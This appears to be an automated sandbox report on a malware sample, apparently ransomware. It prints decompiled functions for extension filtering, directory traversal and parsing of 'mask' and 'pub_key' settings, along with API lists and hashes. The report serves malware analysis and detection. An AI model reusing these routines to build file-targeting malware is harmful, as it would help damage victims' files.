                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0FC66850(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xfc72a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xfc72a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}















                                        0x0fc66853
                                        0x0fc6685c
                                        0x0fc6685e
                                        0x0fc66872
                                        0x0fc66877
                                        0x0fc6687c
                                        0x0fc66890
                                        0x0fc6689a
                                        0x0fc66880
                                        0x0fc66880
                                        0x0fc66886
                                        0x0fc66889
                                        0x0fc6688a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc6688a
                                        0x0fc6688e
                                        0x0fc668b7
                                        0x0fc668bf
                                        0x0fc668c5
                                        0x0fc668cb
                                        0x0fc668d0
                                        0x0fc668d6
                                        0x0fc66922
                                        0x0fc66929
                                        0x0fc6692c
                                        0x0fc668d8
                                        0x0fc668d8
                                        0x0fc668de
                                        0x0fc668e2
                                        0x0fc668e4
                                        0x0fc668e4
                                        0x0fc668e9
                                        0x0fc66909
                                        0x0fc6690d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc668eb
                                        0x0fc668f0
                                        0x0fc668f0
                                        0x0fc668f6
                                        0x00000000
                                        0x00000000
                                        0x0fc668fc
                                        0x0fc668fe
                                        0x00000000
                                        0x0fc66900
                                        0x0fc66900
                                        0x0fc66907
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc66907
                                        0x00000000
                                        0x0fc668fe
                                        0x0fc66920
                                        0x0fc66920
                                        0x00000000
                                        0x0fc66920
                                        0x00000000
                                        0x0fc6690f
                                        0x0fc6690f
                                        0x0fc66913
                                        0x0fc66916
                                        0x0fc66919
                                        0x0fc6691e
                                        0x0fc668de
                                        0x0fc6692f
                                        0x0fc66937
                                        0x0fc66946
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc6688e
                                        0x0fc66860
                                        0x0fc66869
                                        0x0fc66869

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FC6698A), ref: 0FC66872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: %s
                                        • API String ID: 1659193697-4273690596
                                        • Opcode ID: eef2d063c5348654a71e739c050e08591778e8e6e0089f1a9532e8f230ce1719
                                        • Instruction ID: 61e7be34d94ff242de21a70088ed054468adfc052da7d4bb0d63ceb9f9388b3a
                                        • Opcode Fuzzy Hash: eef2d063c5348654a71e739c050e08591778e8e6e0089f1a9532e8f230ce1719
                                        • Instruction Fuzzy Hash: C4213732A1822597D7305B2D9C827B273ECEB84321F44422AED469F281E7B56A50A3D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66D09 Relevance: 9.0, APIs: 6, Instructions: 48stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E0FC66D09() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0FC66950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0FC66C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}








                                        0x0fc66d10
                                        0x0fc66d24
                                        0x0fc66d48
                                        0x0fc66d51
                                        0x0fc66d82
                                        0x0fc66d8d
                                        0x0fc66d8f
                                        0x0fc66d92
                                        0x0fc66d95
                                        0x0fc66d97
                                        0x0fc66da0
                                        0x0fc66da0
                                        0x0fc66da3
                                        0x0fc66da3
                                        0x0fc66d99
                                        0x0fc66d9c
                                        0x0fc66d9e
                                        0x00000000
                                        0x00000000
                                        0x0fc66d9e
                                        0x0fc66d97
                                        0x0fc66d53
                                        0x0fc66d67
                                        0x0fc66d6c
                                        0x0fc66db0
                                        0x0fc66db0
                                        0x0fc66dc3
                                        0x0fc66dce
                                        0x0fc66ddc

                                        APIs
                                        • lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66D1C
                                        • lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC66D48
                                        • lstrcatW.KERNEL32(00000000,0FC6FEFC), ref: 0FC66D59
                                          • Part of subcall function 0FC66C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66CC3
                                          • Part of subcall function 0FC66C90: lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66CDB
                                          • Part of subcall function 0FC66C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66CE5
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FC66DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0FC66DCE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 2032009209-0
                                        • Opcode ID: 2ef74136d9641d58696ec15159d3a1880ea2e3b4a4c1542e6a315b2ce46cc326
                                        • Instruction ID: 60533b80be274da4150b7e3112d6263ae629d81a6240d1694fc9101b95e4bad8
                                        • Opcode Fuzzy Hash: 2ef74136d9641d58696ec15159d3a1880ea2e3b4a4c1542e6a315b2ce46cc326
                                        • Instruction Fuzzy Hash: 0B01563160821EABCF11AB71DC8ABEE7BB8FF44701F004065F905E5011EB359B51EB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC63200 Relevance: 8.8, APIs: 7, Instructions: 73memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC63200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}












                                        0x0fc63205
                                        0x0fc63208
                                        0x0fc6320a
                                        0x0fc6320e
                                        0x0fc6321f
                                        0x0fc6321f
                                        0x0fc63223
                                        0x00000000
                                        0x0fc63225
                                        0x0fc63226
                                        0x0fc6322a
                                        0x0fc63230
                                        0x0fc63235
                                        0x0fc63239
                                        0x00000000
                                        0x00000000
                                        0x0fc6323b
                                        0x00000000
                                        0x0fc63239
                                        0x0fc63245
                                        0x0fc63245
                                        0x0fc63248
                                        0x0fc63248
                                        0x0fc6324e
                                        0x0fc63270
                                        0x0fc63273
                                        0x0fc63284
                                        0x0fc6328a
                                        0x00000000
                                        0x0fc6328a
                                        0x0fc63250
                                        0x0fc63251
                                        0x0fc63262
                                        0x0fc63268
                                        0x0fc6328d
                                        0x0fc6328f
                                        0x0fc63293
                                        0x0fc63293
                                        0x0fc6328f
                                        0x0fc63299
                                        0x0fc632a5
                                        0x0fc632a5
                                        0x0fc63210
                                        0x0fc63210
                                        0x0fc63214
                                        0x0fc63217
                                        0x00000000
                                        0x0fc63219
                                        0x0fc63219
                                        0x0fc6321d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc6321d
                                        0x00000000
                                        0x0fc63217
                                        0x0fc6323e
                                        0x0fc63242
                                        0x0fc63242
                                        0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(0FC652F0,00000000,?,0FC652F1,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63251
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC6325B
                                        • HeapAlloc.KERNEL32(00000000,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63262
                                        • lstrlenA.KERNEL32(0FC652F0,00000000,?,0FC652F1,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63273
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC6327D
                                        • HeapAlloc.KERNEL32(00000000,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63284
                                        • lstrcpyA.KERNEL32(00000000,0FC652F0,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63293
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                        • String ID:
                                        • API String ID: 511007297-0
                                        • Opcode ID: 0d924dad90123f63d28110253685045161254870773bd426647fd137a69d99d7
                                        • Instruction ID: eadb90396c8a1a76bfb5d33cc7056608b7ae986f060dac8eade28fe7775c5397
                                        • Opcode Fuzzy Hash: 0d924dad90123f63d28110253685045161254870773bd426647fd137a69d99d7
                                        • Instruction Fuzzy Hash: B211087000C2D5AFEB200F69988A7B6BF58EF02325F644006FAC5DB343C739A56687B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC63B20 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 0FC63B72
                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FC63B96
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FC63B9A
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FC63B9E
                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FC63BC5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion_memset
                                        • String ID:
                                        • API String ID: 3299124433-0
                                        • Opcode ID: 560b0a49db54a50b0a02fd499674f6e02c569c082199c926f4dd112a374a71e7
                                        • Instruction ID: a65a64fb9c4448dbeec8597463ba79bcef18bcc8ba4e8eb0144d97b2c794a4d1
                                        • Opcode Fuzzy Hash: 560b0a49db54a50b0a02fd499674f6e02c569c082199c926f4dd112a374a71e7
                                        • Instruction Fuzzy Hash: 1A111BB0D4431C6EEB609F65DC0ABEA7ABCEB08700F008199A648E61C1D6B95B948FD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC64CD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0FC64CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xfc6fa84]");
				_t16 =  *0xfc6fa8c; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}























                                        0x0fc64cd6
                                        0x0fc64cde
                                        0x0fc64ce4
                                        0x0fc64ce9
                                        0x0fc64cec
                                        0x0fc64cf1
                                        0x0fc64cf6
                                        0x0fc64cf9
                                        0x0fc64d4a
                                        0x0fc64d4c
                                        0x00000000
                                        0x0fc64d4e
                                        0x0fc64d52
                                        0x0fc64d8f
                                        0x0fc64d91
                                        0x00000000
                                        0x0fc64d93
                                        0x0fc64d9d
                                        0x0fc64da0
                                        0x0fc64da0
                                        0x0fc64da4
                                        0x00000000
                                        0x00000000
                                        0x0fc64daa
                                        0x0fc64daa
                                        0x0fc64dad
                                        0x0fc64db0
                                        0x0fc64db0
                                        0x0fc64db4
                                        0x00000000
                                        0x00000000
                                        0x0fc64dbe
                                        0x0fc64dbe
                                        0x00000000
                                        0x0fc64dba
                                        0x0fc64dbc
                                        0x00000000
                                        0x00000000
                                        0x0fc64dc5
                                        0x0fc64dd4
                                        0x00000000
                                        0x0fc64dd4
                                        0x0fc64db0
                                        0x0fc64d54
                                        0x0fc64d54
                                        0x0fc64d58
                                        0x0fc64d5f
                                        0x0fc64d61
                                        0x0fc64d61
                                        0x0fc64d66
                                        0x0fc64d7f
                                        0x0fc64d82
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d68
                                        0x0fc64d68
                                        0x0fc64d68
                                        0x0fc64d6c
                                        0x00000000
                                        0x00000000
                                        0x0fc64d75
                                        0x0fc64d77
                                        0x00000000
                                        0x0fc64d79
                                        0x0fc64d79
                                        0x0fc64d7d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d7d
                                        0x00000000
                                        0x0fc64d77
                                        0x00000000
                                        0x0fc64d68
                                        0x00000000
                                        0x0fc64d84
                                        0x0fc64d84
                                        0x0fc64d87
                                        0x0fc64d88
                                        0x0fc64d89
                                        0x0fc64d8d
                                        0x00000000
                                        0x0fc64d58
                                        0x0fc64d52
                                        0x0fc64cfb
                                        0x0fc64cfb
                                        0x0fc64cff
                                        0x0fc64d35
                                        0x0fc64d49
                                        0x0fc64d01
                                        0x0fc64d03
                                        0x0fc64d05
                                        0x0fc64d05
                                        0x0fc64d09
                                        0x0fc64d27
                                        0x0fc64d2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d0b
                                        0x0fc64d10
                                        0x0fc64d10
                                        0x0fc64d14
                                        0x00000000
                                        0x00000000
                                        0x0fc64d1d
                                        0x0fc64d1f
                                        0x00000000
                                        0x0fc64d21
                                        0x0fc64d21
                                        0x0fc64d25
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d25
                                        0x00000000
                                        0x0fc64d1f
                                        0x00000000
                                        0x0fc64d10
                                        0x00000000
                                        0x0fc64d2c
                                        0x0fc64d2c
                                        0x0fc64d2f
                                        0x0fc64d30
                                        0x0fc64d31
                                        0x00000000
                                        0x0fc64d05
                                        0x0fc64cff
                                        0x00000000

                                        APIs
                                        • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FC65034), ref: 0FC64D3D
                                        • lstrlenA.KERNEL32(00000000,?,0FC65034), ref: 0FC64D97
                                        • lstrcpyA.KERNEL32(?,?,?,0FC65034), ref: 0FC64DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID: fabian wosar <3
                                        • API String ID: 367037083-1724090804
                                        • Opcode ID: 22668b3d931b376d540a0b54bcddec2e006ccad6ba8016287f3429b2b06e8f62
                                        • Instruction ID: ab07503141e5f13af24848452f54378410a217502a7a542597d6124fad8e830e
                                        • Opcode Fuzzy Hash: 22668b3d931b376d540a0b54bcddec2e006ccad6ba8016287f3429b2b06e8f62
                                        • Instruction Fuzzy Hash: 3631F621C0C2A95ACB3FDE78D4E23FABFA6AF43541F9852D9C9D15B207D2216646C390
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC63190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC63190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}






                                        0x0fc63193
                                        0x0fc63197
                                        0x0fc6319c
                                        0x0fc631b0
                                        0x0fc631b9
                                        0x0fc631ce
                                        0x0fc631d1
                                        0x0fc631d9
                                        0x0fc631e1
                                        0x0fc631e4
                                        0x0fc631e9
                                        0x0fc631a0
                                        0x0fc631a0
                                        0x0fc631a0
                                        0x0fc631a4
                                        0x00000000
                                        0x00000000
                                        0x0fc631a8
                                        0x0fc631ec
                                        0x00000000
                                        0x0fc631aa
                                        0x0fc631aa
                                        0x0fc631ae
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc631ae
                                        0x00000000
                                        0x0fc631a8
                                        0x0fc631f5
                                        0x0fc631f5
                                        0x00000000

                                        APIs
                                        • lstrcmpiA.KERNEL32(0FC652F0,mask,0FC652F1,?,?,0FC63441,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC631B9
                                        • lstrcmpiA.KERNEL32(0FC652F0,pub_key,?,0FC63441,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC631D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi
                                        • String ID: mask$pub_key
                                        • API String ID: 1586166983-1355590148
                                        • Opcode ID: 49180f3f35f83de406178e795cfa8b6ce5642d6746cd4eeafd8d51558072e6af
                                        • Instruction ID: a9c964e2f5e8ca562795662212e664f3e73711c786285ad5236a447577f1d543
                                        • Opcode Fuzzy Hash: 49180f3f35f83de406178e795cfa8b6ce5642d6746cd4eeafd8d51558072e6af
                                        • Instruction Fuzzy Hash: 61F0F67230C2C52EE7154A68ACC77A1BBC99B45311F94057EE68AC2292D6AA9881C764
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:5.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:700
                                        Total number of Limit Nodes:10
